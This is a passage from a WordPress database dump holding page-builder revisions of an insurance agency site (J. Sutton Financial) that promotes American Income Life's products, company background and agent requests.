global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" sticky_enabled=\"0\" animation_direction=\"left\" animation_delay=\"200ms\" url=\"https://www.ailife.com/products\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\" link_option_url=\"https://www.ailife.com/products\" header_3_text_align=\"center\" header_3_font=\"||||||||\" border_color_all=\"#003372\" custom_padding=\"8px||||false|false\" border_radii=\"on|14px|14px|14px|14px\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" animation_direction=\"right\" sticky_enabled=\"0\" animation_delay=\"200ms\" url=\"https://www.ailife.com/manage-my-policy\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\" link_option_url=\"https://www.ailife.com/manage-my-policy\" header_3_text_align=\"center\" header_3_font=\"||||||||\" border_color_all=\"#003372\" custom_padding=\"8px||||false|false\" border_radii=\"on|14px|14px|14px|14px\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"http://cmdev-site1.com/\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" button_bg_enable_color=\"on\" sticky_enabled=\"0\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 20:09:05','2023-04-08 20:09:05','',26,'http://cmdev-site1.com/?p=825',0,'revision','',0),(824,1,'2023-04-08 20:07:42','2023-04-08 20:07:42','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"5\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Request an Agent','','inherit','closed','closed','','819-revision-v1','','','2023-04-08 20:07:42','2023-04-08 20:07:42','',819,'http://cmdev-site1.com/?p=824',0,'revision','',0),(813,1,'2023-04-08 19:50:49','2023-04-08 19:50:49','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" sticky_enabled=\"0\" animation_direction=\"left\" animation_delay=\"200ms\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||148px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" animation_direction=\"right\" sticky_enabled=\"0\" animation_delay=\"200ms\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"http://cmdev-site1.com/\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 19:50:49','2023-04-08 19:50:49','',26,'http://cmdev-site1.com/?p=813',0,'revision','',0),(816,1,'2023-04-08 20:05:36','0000-00-00 00:00:00','','Request an Agent','','draft','open','open','','','','','2023-04-08 20:05:36','2023-04-08 20:05:36','',0,'http://cmdev-site1.com/?p=816',0,'post','',0),(815,1,'2023-04-08 20:00:15','2023-04-08 20:00:15','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" sticky_enabled=\"0\" animation_direction=\"left\" animation_delay=\"200ms\" url=\"https://www.ailife.com/products\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\" link_option_url=\"https://www.ailife.com/products\" header_3_text_align=\"center\" header_3_font=\"||||||||\" border_color_all=\"#003372\" custom_padding=\"8px||||false|false\" border_radii=\"on|14px|14px|14px|14px\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" animation_direction=\"right\" sticky_enabled=\"0\" animation_delay=\"200ms\" url=\"https://www.ailife.com/manage-my-policy\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\" link_option_url=\"https://www.ailife.com/manage-my-policy\" header_3_text_align=\"center\" header_3_font=\"||||||||\" border_color_all=\"#003372\" custom_padding=\"8px||||false|false\" border_radii=\"on|14px|14px|14px|14px\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"http://cmdev-site1.com/\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 20:00:15','2023-04-08 20:00:15','',26,'http://cmdev-site1.com/?p=815',0,'revision','',0),(832,1,'2023-04-08 20:30:08','2023-04-08 20:30:08','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"J. Sutton Financial Articles\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin=\"24px|||||\" sticky_enabled=\"0\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" custom_margin=\"15px|||||\" custom_padding=\"||31px|||\" global_colors_info=\"{}\"]<p style=\"font-weight: 400;\">Our resource articles are created to empower you with knowledge about insurance-related products, protection, prevention, and much more. Our hope is to educate our readers so you can feel confident when discussing insurance options – everything you read is unbiased and not specific to J. Sutton Financial policies.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-13px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-85px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"9\" include_categories=\"all\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" read_more_font=\"|700|||on|||#003372|dotted\" read_more_text_color=\"#003372\" read_more_font_size=\"16px\" pagination_font=\"||||on|||#000000|dotted\" pagination_text_color=\"#003372\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','inherit','closed','closed','','615-revision-v1','','','2023-04-08 20:30:08','2023-04-08 20:30:08','',615,'http://cmdev-site1.com/?p=832',0,'revision','',0),(833,1,'2023-04-08 20:36:53','2023-04-08 20:36:53','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" text_text_color=\"#000000\" sticky_enabled=\"0\" header_text_color=\"#003372\" header_2_text_color=\"#003372\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" parallax=\"on\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" text_text_color=\"#2b2b2b\" sticky_enabled=\"0\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" text_text_color=\"#2b2b2b\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row 